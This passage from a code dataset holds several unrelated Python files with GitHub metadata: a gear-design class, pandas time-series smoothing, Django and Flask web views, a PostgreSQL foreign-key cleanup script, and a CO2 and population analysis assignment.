params_dict : dict\r\n Dicionário com os parâmetros de correção do método AGMA.\r\n\r\n \"\"\"\r\n \r\n params_dict = {'C_s':self.Cs,\r\n 'C_m':self.Cm,\r\n 'C_v':self.Cv,\r\n 'Vs':self.Vs\r\n }\r\n \r\n \r\n return params_dict\r\n \r\n def get_dims(self):\r\n \"\"\"\r\n Gera dicionário com os parâmetros dimensionais do engrenamento\r\n\r\n Returns\r\n -------\r\n params_dict : dict\r\n Dicionário com os parâmetros dimensionais do engrenamento.\r\n\r\n \"\"\"\r\n params_dict = {'a':self.a,\r\n 'b':self.b,\r\n 'c':self.c,\r\n 'lambda':self.lambd,\r\n 'Pn':self.Pn,\r\n 'Pt':self.Pt}\r\n \r\n \r\n return params_dict\r\n\r\n \r\n\r\n","repo_name":"valtervg13/MechPy","sub_path":"MechPy/ComponentDesign/Gears.py","file_name":"Gears.py","file_ext":"py","file_size_in_byte":49219,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"14392081700","text":"import os\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport ts_functions as ts\n\ndata = pd.read_csv('../Dataset/deaths_pt.csv', index_col='start_date', sep=',', decimal='.',\n parse_dates=True, infer_datetime_format=True)\ndata = data.sort_values(by='start_date')\n\ngraphsDir = './Results/Transformation/Smoothing/'\nif not os.path.exists(graphsDir):\n os.makedirs(graphsDir)\n\nprint('Deaths - Smoothing')\n\nplt.figure(figsize=(3*ts.HEIGHT, ts.HEIGHT/2))\nts.plot_series(data, x_label='start_date', y_label='deaths', title='DEATHS original')\nplt.xticks(rotation = 45)\nplt.suptitle('Deaths - win_size = 10')\nplt.savefig(graphsDir + 'Deaths - win_size = 10')\n\nWIN_SIZE = 100\nrolling = data.rolling(window=WIN_SIZE)\nsmooth_df = rolling.mean()\nplt.figure(figsize=(3*ts.HEIGHT, ts.HEIGHT/2))\nts.plot_series(smooth_df, title=f'Smoothing (win_size={WIN_SIZE})', x_label='start_date', y_label='deaths')\nplt.xticks(rotation = 45)\nplt.suptitle('Deaths - win_size = 100')\nplt.savefig(graphsDir + 'Deaths - win_size = 100')\n\n\ngraphsDir = './Results/Transformation/Aggregation/'\nif not os.path.exists(graphsDir):\n os.makedirs(graphsDir)\n\nprint('Deaths - Aggregation')\n\ndef aggregate_by(data: pd.Series, index_var: str, period: str, title: str = '', x_label: str = '', y_label: str = ''):\n index = data.index.to_period(period)\n agg_df = data.copy().groupby(index).mean()\n agg_df[index_var] = index.drop_duplicates().to_timestamp()\n agg_df.set_index(index_var, drop=True, inplace=True)\n ts.plot_series(agg_df, title=title, x_label=x_label, y_label=y_label)\n\nplt.figure(figsize=(3*ts.HEIGHT, ts.HEIGHT))\naggregate_by(data, 'start_date', 'D', title='Daily deaths', x_label='start_date', y_label='deaths')\nplt.xticks(rotation = 45)\nplt.suptitle('Deaths - Daily')\nplt.savefig(graphsDir + 'Deaths - Daily')\n\nplt.figure(figsize=(3*ts.HEIGHT, ts.HEIGHT))\naggregate_by(data, 'start_date', 'W', title='Weekly deaths', x_label='start_date', y_label='deaths')\nplt.xticks(rotation = 45)\nplt.suptitle('Deaths - Weekly')\nplt.savefig(graphsDir + 'Deaths - Weekly')\n\nplt.figure(figsize=(3*ts.HEIGHT, ts.HEIGHT))\naggregate_by(data, 'start_date', 'M', title='Monthly deaths', x_label='start_date', y_label='deaths')\nplt.xticks(rotation = 45)\nplt.suptitle('Deaths - Monthly')\nplt.savefig(graphsDir + 'Deaths - Monthly')\n\n\ngraphsDir = './Results/Transformation/Differentiation/'\nif not os.path.exists(graphsDir):\n os.makedirs(graphsDir)\n\nprint('Deaths - Differentiation')\n\ndiff_df = data.diff()\nplt.figure(figsize=(3*ts.HEIGHT, ts.HEIGHT))\nts.plot_series(diff_df, title='Differentiation', x_label='start_date', y_label='deaths')\nplt.xticks(rotation = 45)\nplt.suptitle('Deaths - Differentiation')\nplt.savefig(graphsDir + 'Deaths - Differentiation')\n\nprint('Deaths - Change of Space - TODO')\n","repo_name":"isabelSoares/CD-2021","sub_path":"Last_Labs/deaths_transformation.py","file_name":"deaths_transformation.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"36260506642","text":"from authentications.utils import get_correlation_id_from_username, check_permissions_by_user\nfrom web_admin import setup_logger, api_settings\nfrom web_admin.restful_client import RestFulClient\nfrom django.views.generic.base import TemplateView\nfrom web_admin.get_header_mixins import GetHeaderMixin\nfrom django.conf import settings\nfrom django.shortcuts import render\nimport logging\nfrom braces.views import GroupRequiredMixin\nfrom authentications.apps import InvalidAccessToken\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass CardProviderList(GroupRequiredMixin, TemplateView, GetHeaderMixin):\n group_required = \"SYS_VIEW_LIST_PROVIDER\"\n template_name = \"card_provider/card_provider.html\"\n url = api_settings.SEARCH_CARD_PROVIDER\n logger = logger\n login_url = 'web:permission_denied'\n\n def dispatch(self, request, *args, **kwargs):\n correlation_id = get_correlation_id_from_username(self.request.user)\n self.logger = setup_logger(self.request, logger, correlation_id)\n return super(CardProviderList, self).dispatch(request, *args, **kwargs)\n\n def check_membership(self, permission):\n self.logger.info(\n \"Checking permission for [{}] username with [{}] permission\".format(self.request.user, permission))\n return check_permissions_by_user(self.request.user, permission[0])\n\n def post(self, request, *args, **kwargs):\n self.logger.info('========== Start get card provider list ==========')\n context = super(CardProviderList, self).get_context_data(**kwargs)\n provider_name = request.POST.get('provider_name')\n params = {}\n if provider_name:\n params['name'] = provider_name\n self.logger.info('Params: {}'.format(params))\n is_success, status_code, status_message, data = RestFulClient.post(url=self.url,\n headers=self._get_headers(),\n loggers=self.logger,\n timeout=settings.GLOBAL_TIMEOUT,\n params=params)\n if not is_success:\n if status_code in [\"access_token_expire\", 'authentication_fail', 'invalid_access_token']:\n self.logger.info(\"{}\".format(status_message))\n raise InvalidAccessToken(status_message)\n self.logger.info('Response_content_count: {}'.format(len(data)))\n is_permission_detail = check_permissions_by_user(self.request.user, 'SYS_VIEW_DETAIL_PROVIDER')\n is_permission_edit = check_permissions_by_user(self.request.user, 'SYS_EDIT_PROVIDER')\n\n for i in data:\n i['is_permission_detail'] = is_permission_detail\n i['is_permission_edit'] = is_permission_edit\n\n context.update({\n 'data': data,\n 'provider_name': provider_name\n })\n self.logger.info('========== Finish get card provider list ==========')\n\n return render(request, self.template_name, context)\n\n","repo_name":"thol-voleak/ami-kh-devops_python","sub_path":"web_admin/card_provider/views/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":3138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28848921933","text":"from flask import (\n render_template,\n request,\n Blueprint,\n g,\n current_app,\n)\nfrom marshmallow import ValidationError, EXCLUDE\nfrom flask_jwt_extended import (\n get_jwt_identity,\n jwt_required,\n jwt_optional,\n)\nfrom app.model.email import (\n EmailModel,\n EmailSchema,\n Email_subscribe_log,\n Email_unsubscribe_log,\n)\nfrom app.model.article import (\n Article_tag_schema,\n)\nfrom app.views.abort_msg import abort_msg\nfrom app.views.celery_tasks.tasks import send_mail_now_task, send_check_mail\n\nemail = Blueprint(\"email\", __name__)\nemail_schema = EmailSchema()\narticle_tag_schema = Article_tag_schema()\n\n\n# Subscribe Email\n@email.route(\"/subscribe\", methods=[\"GET\", \"POST\"])\n@jwt_optional\ndef subscribe():\n # Submit Result Page\n if request.method == \"GET\":\n # Validate\n data = get_jwt_identity()\n if data:\n EmailModel.subscribe(data)\n Email_subscribe_log.subscribe(data)\n return render_template(\n \"/email/submit_result_success.html\", result_type=\"Register success\"\n )\n\n # Send Submit Mail work\n if request.method == \"POST\":\n try:\n # Validate\n data = request.json\n data_valide = email_schema.load(data, unknown=EXCLUDE)\n # Check Mail exist or not\n if EmailModel.get_by_email(data_valide[\"email\"]):\n return {\"message\": \"already\"}, 200\n else:\n lang = g.get(\"lang_code\")\n send_check_mail.delay(data_valide[\"email\"], lang)\n return {\"message\": \"send\"}, 200\n\n except ValidationError as error:\n current_app.logger.error(error.messages)\n return {\"errors\": error.messages}, 400\n\n except Exception as e:\n current_app.logger.error(abort_msg(e))\n return {\"errors\": abort_msg(e)}, 422\n\n\n# Unsubscribe Email\n@email.route(\"/unsubscribe\", methods=[\"GET\"])\n@jwt_required\ndef unsubscribe():\n data = get_jwt_identity()\n if data:\n EmailModel.unsubscribe(data)\n Email_unsubscribe_log.unsubscribe(data)\n return render_template(\n \"/email/submit_result_success.html\", result_type=\"Unsubscribe success\"\n )\n\n\n# Testing Email\n@email.route(\"/\")\ndef test():\n data = request.values\n if data:\n send_mail_now_task.delay(data[\"email\"])\n else:\n send_mail_now_task.delay()\n return \"666\"\n","repo_name":"hsuanchi/Max-Newsletter","sub_path":"flask/app/views/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"34"} +{"seq_id":"34912397085","text":"import psycopg2\n\nconn = psycopg2.connect(database=\"bdalmacen\", user=\"\", password=\"\", host=\"localhost\", port=\"5432\")\n\nif conn == None:\n print('Error de conexion con la base de datos')\n exit()\n\ncur = conn.cursor()\nsql = \"SELECT tablename FROM pg_catalog.pg_tables WHERE schemaname != 'pg_catalog' AND schemaname != 'information_schema'\"\ncur.execute(sql)\ntablas = []\n\nfor row in cur.fetchall():\n tablas.append(row[0])\n\nfks_incorrectas = []\n\nfor tabla in tablas:\n sql = f\"SELECT con.conname FROM pg_catalog.pg_constraint con INNER JOIN pg_catalog.pg_class rel ON rel.oid = con.conrelid INNER JOIN pg_catalog.pg_namespace nsp ON nsp.oid = connamespace WHERE nsp.nspname = 'public' AND rel.relname = '{tabla}'\"\n cur.execute(sql)\n\n for row in cur.fetchall():\n if '0' in row[0] or '1' in row[0] or '2' in row[0] or '3' in row[0] or '4' in row[0] or '5' in row[0] or '6' in row[0] or '7' in row[0] or '8' in row[0] or '9' in row[0]:\n fks_incorrectas.append((tabla, row[0]))\n\nfor tabla, fk in fks_incorrectas:\n sql = f\"ALTER TABLE {tabla} DROP CONSTRAINT {fk}\"\n cur.execute(sql)\n conn.commit()\n\ncur.close()\nconn.close()\n\nprint('Exito')","repo_name":"evero91/migracion-postgres","sub_path":"fk_fix.py","file_name":"fk_fix.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"40954545969","text":"from django.conf import settings\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator\nfrom django.shortcuts import get_object_or_404, redirect, render\n\nfrom .forms import PostForm, CommentForm\nfrom .models import Group, Post, User, Follow\n\n\ndef pagination(request, posts):\n paginator = Paginator(posts, settings.POSTS_PER_PAGE)\n page_number = request.GET.get('page')\n return paginator.get_page(page_number)\n\n\ndef index(request):\n posts = Post.objects.all()\n context = {\n 'page_obj': pagination(request, posts),\n }\n return render(request, 'posts/index.html', context)\n\n\ndef group_posts(request, slug):\n group = get_object_or_404(Group, slug=slug)\n posts = group.posts.all()\n context = {\n 'group': group,\n 'page_obj': pagination(request, posts),\n }\n return render(request, 'posts/group_list.html', context)\n\n\ndef profile(request, username):\n user_obj = get_object_or_404(User, username=username)\n posts = user_obj.posts.all()\n posts_number = posts.count()\n following = (request.user.is_authenticated\n and Follow.objects.filter(\n user=request.user,\n author=user_obj).exists())\n context = {\n 'username': user_obj,\n 'posts_number': posts_number,\n 'page_obj': pagination(request, posts),\n 'following': following\n }\n return render(request, 'posts/profile.html', context)\n\n\ndef post_detail(request, post_id):\n post = get_object_or_404(Post, pk=post_id)\n comments = post.comments.all()\n author = post.author\n posts_number = author.posts.all().count()\n form = CommentForm()\n context = {\n 'author': author,\n 'post': post,\n 'posts_number': posts_number,\n 'form': form,\n 'comments': comments\n }\n return render(request, 'posts/post_detail.html', context)\n\n\n@login_required\ndef post_create(request):\n form = PostForm(request.POST or None,\n files=request.FILES or None)\n if form.is_valid():\n post = form.save(commit=False)\n post.author = request.user\n form.save()\n return redirect('posts:profile', post.author.username)\n form = PostForm()\n return render(\n request,\n 'posts/create_post.html',\n {\n 'form': form,\n 'is_edit': False})\n\n\n@login_required\ndef post_edit(request, post_id):\n post = get_object_or_404(Post, pk=post_id)\n if request.user != post.author:\n return redirect('posts:post_detail', post_id=post_id)\n form = PostForm(\n request.POST or None,\n files=request.FILES or None,\n instance=post\n )\n if form.is_valid():\n form.save()\n return redirect('posts:post_detail', post_id=post_id)\n form = PostForm(request.POST, instance=post)\n return render(\n request,\n 'posts/create_post.html',\n {'form': form,\n 'is_edit': True})\n\n\n@login_required\ndef add_comment(request, post_id):\n post = get_object_or_404(Post, pk=post_id)\n form = CommentForm(request.POST or None)\n if form.is_valid():\n comment = form.save(commit=False)\n comment.author = request.user\n comment.post = post\n comment.save()\n return redirect('posts:post_detail', post_id=post_id)\n\n\n@login_required\ndef follow_index(request):\n user = request.user\n posts = Post.objects.filter(author__following__user=user).all()\n context = {\n 'page_obj': pagination(request, posts)\n }\n return render(request, 'posts/follow.html', context)\n\n\n@login_required\ndef profile_follow(request, username):\n user = request.user\n user_to_follow = get_object_or_404(User, username=username)\n if user != user_to_follow:\n obj, created = Follow.objects.get_or_create(\n user=user,\n author=user_to_follow)\n return redirect('posts:profile', username=user_to_follow)\n\n\n@login_required\ndef profile_unfollow(request, username):\n # Дизлайк, отписка\n user = request.user\n user_to_follow = get_object_or_404(User, username=username)\n if user != user_to_follow:\n Follow.objects.filter(user=user, author=user_to_follow).delete()\n return redirect('posts:profile', username=user_to_follow)\n","repo_name":"IuriyLeb/yatube_final","sub_path":"yatube/posts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"34623049839","text":"\"\"\" Assignment 2 \"\"\"\r\n\r\n# libraries - general\r\nimport matplotlib.pyplot as plt \r\nimport numpy as np \r\nimport pandas as pd\r\n\r\n# libraries - statistics\r\nfrom scipy import interpolate\r\nfrom scipy import stats\r\nfrom scipy.stats import kurtosis, skew\r\nfrom scipy.stats import shapiro\r\n\r\n# libraries - trying new things\r\nimport pycountry_convert as pc\r\nfrom pycountry_convert import country_alpha2_to_continent_code, country_name_to_country_alpha2\r\n\r\n\r\n\"\"\" Functions for Data Pre-Processing \"\"\"\r\n\r\n# data pre-processing function \r\ndef pre_processing(x):\r\n '''\r\n Parameters\r\n ----------\r\n x : dataset, performing functions described below on the dataset\r\n Returns\r\n -------\r\n the column values with ',' replaced and \r\n stored as an int value\r\n '''\r\n head = x.head() # displaying the first 5 lines in the data\r\n tail = x.tail() # displaying the last 5 lines in the data\r\n columns = x.columns # name of columns in dataset\r\n describe = x.describe # general statistics on the dataset \r\n info = x.info # general statistics on the dataset \r\n null = x.isna().sum() # any nan values in columns of dataset\r\n dtype = x.dtypes # data types of the columns in the dataset\r\n index = x.index # the row identifirs\r\n \r\n return (f'The top 5 columns in the dataset = \\n {head} \\n \\\r\n The bottom 5 columns in the dataset = \\n {tail} \\n \\\r\n The name of the columns in the dataset = \\n {columns} \\n \\\r\n The statistic description of the dataset = \\n {describe} \\n \\\r\n The information on the dataset = \\n {info} \\n \\\r\n The presence of any NA values = \\n {null} \\n \\\r\n The datatype of the columns in the dataset = \\n {dtype} \\n \\\r\n The index of the dataset = \\n {index}') \r\n\r\ndef data_load(x):\r\n x = input() # user would input the location of the file e.g. 'C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/total co2.csv'\r\n df = pd.read(x,\r\n header = 2,\r\n engine = \"python\",\r\n dtype = \"str\")\r\n return df\r\n\r\ndef clean_convert(df, column):\r\n '''\r\n Parameters\r\n ----------\r\n df : dataframe to be manipulated\r\n column : column of the dataframe to be manipulated\r\n\r\n Returns\r\n -------\r\n df : changes the column datatype to float\r\n\r\n '''\r\n df[column] = pd.to_numeric(df[column], \r\n downcast = \"float\")\r\n return df\r\n \r\n# loading in the datasets \r\ndf = pd.read_csv('C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/total co2.csv',\r\n header = 2, # it removes the top line of jargon as its not data\r\n engine = \"python\",\r\n dtype = \"str\")\r\n\r\n\r\n\"\"\" CO2 Emissions Dataset and Pre-Processing \"\"\"\r\n\r\n# performing pre-processing\r\nprint(pre_processing(df))\r\n\r\n#all data are saved as objects so need to change them to being floats\r\nfor col in df.columns[4:]:\r\n df = clean_convert(df, col)\r\nprint(df.dtypes)\r\n\r\n# removing unuseful columns\r\ndf.drop(['Country Code', 'Indicator Name', 'Indicator Code', '2019', '2020', 'Unnamed: 65'],\r\n axis = 1,\r\n inplace = True)\r\n\r\n# renaming a column\r\ndf.loc[254, 'Country Name'] = \"Venezuela\"\r\n\r\n\r\n\"\"\" Identifying rows to use for south america analysis\"\"\"\r\n\r\nsa_df = df[(df['Country Name'] == 'Argentina') |\r\n (df['Country Name'] == 'Bolivia') |\r\n (df['Country Name'] == 'Brazil') |\r\n (df['Country Name'] == 'Chile') |\r\n (df['Country Name'] == 'Colombia') |\r\n (df['Country Name'] == 'Ecuador') |\r\n (df['Country Name'] == 'Guyana') |\r\n (df['Country Name'] == 'Paraguay') |\r\n (df['Country Name'] == 'Peru') |\r\n (df['Country Name'] == 'Suriname') |\r\n (df['Country Name'] == 'Uruguay') |\r\n (df['Country Name'] == 'Venezuela')]\r\n\r\n# resetting the index \r\nsa_df.reset_index(inplace = True,\r\n drop = True)\r\n\r\n\r\n\"\"\" Summary Statistics on SA Dataset \"\"\"\r\n\r\n# performng data pre-procssing\r\nprint(pre_processing(sa_df))\r\n\r\n'''\r\nthere are no NA values in any of the columns/ rows so no need\r\nfor interpolation but will experiment using a new dataframe and\r\nset some of those values to be NA.\r\nthis function contains the sub-functions; describe and info\r\n'''\r\n\r\n\r\n\"\"\" Shapiro-Wilk test for normality on SA CO2 dataset \"\"\"\r\n\r\nfrom scipy.stats import shapiro\r\n\r\n# performing shapiro-wilk test\r\nshapiro_test = (sa_df.groupby('Country Name')\r\n .apply(lambda x: pd.Series(shapiro(x), index = ['W', 'P'])))\r\n\r\n# printing the results of the test to the console\r\nprint(shapiro_test)\r\n\r\n'''\r\nCountries accept null hypothesis: Guyana, Uruguay, and Colombia\r\n(countries are normality distributed across the years)\r\n\r\nCountries reject null hypothesis: the rest\r\n(countries are not normality distributed across the years)\r\n'''\r\n\r\n\r\n\"\"\" Skewness and Kurtosis on SA Population dataset \"\"\"\r\n\r\n# performing shapiro-wilk test\r\nskewness_test1 = (sa_df.groupby('Country Name')\r\n .apply(lambda x: pd.Series(skew(x))))\r\n\r\nkurtosis_test1 = (sa_df.groupby('Country Name')\r\n .apply(lambda x: pd.Series(kurtosis(x))))\r\n\r\n# printing the results of the test to the console\r\nprint(skewness_test1, '\\n', \r\n kurtosis_test1)\r\n\r\n\r\n\"\"\" Boxplot to look for outliers in each COUNTRY (over the years) \"\"\"\r\n\r\nsa_box = sa_df.set_index('Country Name').transpose()\r\n\r\n# resetting the index\r\nsa_box.reset_index(level = 0,\r\n inplace = True)\r\n\r\n# the column had wrong name so have to rename\r\nsa_box.rename(columns = {\"index\": \"Year\"},\r\n inplace = True)\r\n\r\n# plotting the boxplot\r\nfig12 = sa_box.boxplot(rot = 45,\r\n fontsize = 10,\r\n grid = True,\r\n color = 'purple')\r\n\r\n# adding extra things for visualisation\r\nplt.title('The CO2 emissions of South American Countries')\r\nplt.ylabel('CO2 emissions')\r\nplt.xlabel('Country')\r\n\r\n# show the graph\r\nplt.show()\r\n\r\n# saving the figure\r\nplt.savefig('C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/figure12.png')\r\n\r\n'''\r\nfrom the boxplot there appears to be outliers above the boxplot\r\nin the countries:\r\n - Bolivia\r\n - Guyana\r\n - Peru\r\n - Suriname \r\n - Uruguay\r\nthis makes sense owing to the CO2 emissions data values being \r\nvery close together and thus some values are 2 standard deviations above\r\nthe mean. Interesting no outliers below the boxplot.\r\n'''\r\n\r\n\r\n\"\"\" Population Dataset and Pre-Processing \"\"\"\r\n\r\n# reading in the new dataframe\r\ndf2 = pd.read_csv('C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/total population.csv',\r\n header = 2,\r\n engine = \"python\",\r\n dtype = \"str\")\r\n\r\n# performing pre-processing and some basic statistics\r\nprint(pre_processing(df2))\r\n\r\n# ensuring the columns have the correct datatype now\r\nfor col in df2.columns[4:]:\r\n df2 = clean_convert(df2, col)\r\n\r\n# dropping unuseful columns\r\ndf2.drop(labels = ['Country Code', 'Indicator Name', 'Indicator Code', '2019', '2020', 'Unnamed: 65'],\r\n axis = 1, # column axis\r\n inplace = True)\r\n\r\n# renaming a column\r\ndf.loc[254, 'Country Name'] = \"Venezuela\"\r\n\r\n\r\n\"\"\" Subsetting the data Population data to be only South American countries \"\"\"\r\n\r\nsa_df2 = df2[(df2['Country Name'] == 'Argentina') |\r\n (df2['Country Name'] == 'Bolivia') |\r\n (df2['Country Name'] == 'Brazil') |\r\n (df2['Country Name'] == 'Chile') |\r\n (df2['Country Name'] == 'Colombia') |\r\n (df2['Country Name'] == 'Ecuador') |\r\n (df2['Country Name'] == 'Guyana') |\r\n (df2['Country Name'] == 'Paraguay') |\r\n (df2['Country Name'] == 'Peru') |\r\n (df2['Country Name'] == 'Suriname') |\r\n (df2['Country Name'] == 'Uruguay') |\r\n (df2['Country Name'] == 'Venezuela')]\r\n\r\n# resetting the index \r\nsa_df2.reset_index(inplace = True,\r\n drop = True)\r\n\r\n\r\n\"\"\" Summary Statistics on SA Dataset \"\"\"\r\nprint(pre_processing(sa_df2))\r\n\r\n\r\n\"\"\" Shapiro-Wilk test for normality on SA Population dataset \"\"\"\r\n\r\n# performing shapiro-wilk test\r\npop_shapiro_test = (sa_df2.groupby('Country Name')\r\n .apply(lambda x: pd.Series(shapiro(x), index = ['W', 'P'])))\r\n\r\n# printing the results of the test to the console\r\nprint(pop_shapiro_test)\r\n\r\n'''\r\nCountries accept null hypothesis: None\r\n(countries are normality distributed across the years)\r\n\r\nCountries reject null hypothesis: All\r\n(countries are not normality distributed across the years)\r\n'''\r\n\r\n\r\n\"\"\" Skewness and Kurtosis on SA Population dataset \"\"\"\r\n\r\n# performing shapiro-wilk test\r\nskewness_test2 = (sa_df2.groupby('Country Name')\r\n .apply(lambda x: pd.Series(skew(x))))\r\n\r\nkurtosis_test2 = (sa_df2.groupby('Country Name')\r\n .apply(lambda x: pd.Series(kurtosis(x))))\r\n\r\n# printing the results of the test to the console\r\nprint(skewness_test2, '\\n', \r\n kurtosis_test2)\r\n\r\n\r\n\"\"\" Boxplot to look for outliers in each COUNTRY (over the years) \"\"\"\r\n\r\n# transposing the data\r\nsa_pop_box = sa_df2.set_index('Country Name').transpose()\r\n\r\n# resetting the index\r\nsa_pop_box.reset_index(level = 0,\r\n inplace = True)\r\n\r\n# the column had wrong name so have to rename\r\nsa_pop_box.rename(columns = {\"index\": \"Year\"},\r\n inplace = True)\r\n\r\n# plotting the boxplot\r\nfig13 = sa_pop_box.boxplot(rot = 45,\r\n fontsize = 10,\r\n grid = True,\r\n color = 'orange')\r\n\r\n# adding extra things for visualisation\r\nplt.title('The Population of South American Countries')\r\nplt.ylabel('Population (billions)')\r\nplt.xlabel('Country')\r\n\r\n# show the graph\r\nplt.show()\r\n\r\n'''\r\nfrom the boxplot there appears to only be outliers above the boxplot\r\nin the country Guyana.\r\n'''\r\n\r\n# saving the boxplot\r\nplt.savefig('C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/figure13.png')\r\n\r\n\r\n\r\n\"\"\" Double axis plot (trying something new) \"\"\"\r\n\r\n\"\"\" Data Manipulation of CO2 emissions\"\"\"\r\n\r\n# copy original data\r\nco2_df = df.copy()\r\n\r\n# adding total rows and columns for plots\r\nco2_df.loc['Column_Total']= co2_df.sum(numeric_only=True, axis=0)\r\n\r\n# transposing data to make it easy\r\nco2_df = co2_df.set_index('Country Name').transpose()\r\nco2_df.reset_index(level = 0,\r\n inplace = True)\r\nco2_df.rename(columns = {\"index\": \"Year\"},\r\n inplace = True)\r\n\r\n# rename the NaN column\r\nco2_df.rename(columns = {np.nan: \"Column Total\" }, \r\n inplace = True)\r\n\r\n# subset new dataframe \r\nco2_df = co2_df[['Year', 'Column Total']]\r\n\r\n\r\n\"\"\" Data Manipulation of Population \"\"\"\r\n\r\n# copy original population data to add to the plot above\r\npop_df = df2.copy()\r\n\r\n# adding total rows and columns for plots\r\npop_df.loc['Column_Total']= pop_df.sum(numeric_only=True, axis=0)\r\n#co2_df.loc[:,'Row_Total'] = co2_df.sum(numeric_only=True, axis=1)\r\n\r\n# transposing data to make it easy\r\npop_df = pop_df.set_index('Country Name').transpose()\r\n\r\n# resetting the index\r\npop_df.reset_index(level = 0,\r\n inplace = True)\r\n\r\n# renaming the column to access it \r\npop_df.rename(columns = {\"index\": \"Year\"},\r\n inplace = True)\r\n\r\n# rename the NaN column\r\npop_df.rename(columns = {np.nan: \"Column Total\" }, \r\n inplace = True)\r\n\r\n# subset new dataframe \r\npop_df = pop_df[['Year', 'Column Total']]\r\n\r\n\r\n\"\"\" Total CO2 line plot \"\"\"\r\n\r\n# plotting the TOTAL co2 emissions through the years\r\nfig1, axs1 = plt.subplots(figsize = (20, 10))\r\naxs1.plot(co2_df['Year'], co2_df['Column Total'],\r\n color = 'magenta', \r\n marker = 'o', \r\n linestyle = 'dashed',\r\n linewidth = 2, \r\n markersize = 12,\r\n label = 'World CO2 emissions')\r\n\r\n# adding extra items to the plot\r\nplt.xticks(rotation = 90)\r\nplt.xlabel('Years',\r\n fontsize = 20)\r\nplt.ylabel('CO2 emissions (kt in 100 million)',\r\n fontsize = 20)\r\nplt.legend(loc = 'upper left',\r\n fontsize = 15)\r\n\r\n# twinning the axs to make two plots on one figure (CO2 emissions and pop)\r\naxs11 = axs1.twinx()\r\n\r\n\r\n\"\"\" Total Population line plot \"\"\"\r\n\r\n# plotting the TOTAL pop emissions through the years\r\naxs11.plot(pop_df['Year'], pop_df['Column Total'],\r\n color = 'orange', \r\n marker = 'o', \r\n linestyle = 'dashed',\r\n linewidth = 2, \r\n markersize = 12,\r\n label = 'World Population')\r\n\r\n# adding extra things to the plot for better visualisation\r\nplt.xticks(rotation = 90)\r\nplt.xlabel('Years',\r\n fontsize = 20)\r\nplt.ylabel('Population (in billions)',\r\n fontsize = 20)\r\nplt.legend(loc = 'lower right',\r\n fontsize = 15)\r\n\r\n# show the figure with two different y-axis\r\nplt.show()\r\n\r\n# saving the figure\r\nplt.savefig('C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/figure11.png')\r\n\r\n\r\n\"\"\" Correlation between WORLD CO2 and Pop datasets overtime \"\"\"\r\n\r\n# using the .corrwith function to do the whole of the subsetted dataframe\r\nprint('WORLD: correlation between population and CO2 emissions')\r\nprint(co2_df.corrwith(pop_df))\r\n\r\n\r\n\r\n\"\"\" Trying something new for a map of south america CO2 emissions (1980 and 2018)\"\"\"\r\n\r\n# copying south american dataset\r\nsa_df2 = sa_df.copy()\r\n\r\n# renaming the a column so it is easier to manipulate\r\nsa_df2.rename(columns = {'Country Name': 'country'},\r\n inplace = True)\r\n\r\n#function to convert to alpah2 country codes\r\ndef cont_convert(row):\r\n # convert country name to country code \r\n for country in row.country:\r\n try:\r\n cn_code = pc.country_name_to_country_alpha2(row.country, \r\n cn_name_format = \"default\")\r\n # if an error occurs (prevention of code not running)\r\n except KeyError:\r\n pass\r\n return cn_code\r\n\r\n# applying function to dataframe\r\nsa_df2['code'] = sa_df2.apply(cont_convert, \r\n axis = 1)\r\n# making sure it has worked\r\nprint(sa_df2.tail())\r\n\r\n# libraries for specific method\r\nimport plotly\r\nimport plotly.express as px\r\n\r\n# create figure for the newest measurements\r\nfig2 = px.choropleth(sa_df2,\r\n locations = 'country',\r\n locationmode = \"country names\",\r\n color = '2018', \r\n scope = \"south america\")\r\n\r\n# plotly is browser based so had to write as a html to view image\r\nfig2.write_html(\"C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/figure2.html\")\r\n\r\n# create figure for the oldest measurements\r\nfig3 = px.choropleth(sa_df2,\r\n locations = 'country',\r\n locationmode = \"country names\",\r\n color = '1960', \r\n scope = \"south america\")\r\n\r\n# plotly is browser based so had to write as a html to view image\r\nfig3.write_html(\"C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/figure3.html\")\r\n\r\n'''\r\nthese two figures when looked at using the HTML are interactive,\r\nwhereby using the mouse and hovering over a particular \r\nsouth american country the map displays the country name and \r\nthe actual CO2 emissions of the respective country. However,\r\nthis cannot be observed within the A4 report.\r\n'''\r\n\r\n\r\n\"\"\" Correlation between 1980 and 2018 for CO2 emissions \"\"\"\r\n\r\n#adding row total into the table\r\nsa_df2.loc[:,'Row_Total'] = sa_df2.sum(numeric_only=True, axis=1)\r\n\r\nco2_1980 = sa_df2['1980']\r\nprint(\"CO2 emissions in 1980 =\", '\\n', co2_1980)\r\nco2_2018 = sa_df2['2018']\r\nprint(\"CO2 emissions in 2018 =\", '\\n', co2_2018)\r\n\r\nprint('CO2 EMISSIONS: Correlation between 1980 and 2018 in SA countries')\r\na, b = stats.pearsonr(co2_1980, co2_2018)\r\nprint(f'pearson rank test: r={a}, p={b}')\r\nc, d = stats.spearmanr(co2_1980, co2_2018)\r\nprint(f'spearman rank test: r={c}, p={d}')\r\n\r\n\r\n\r\n\"\"\" Stacked area plot of CO2 production \"\"\"\r\n\r\n# transposing data for ease of manipulation\r\nsa_co2_df = sa_df.set_index('Country Name').transpose()\r\n\r\n# 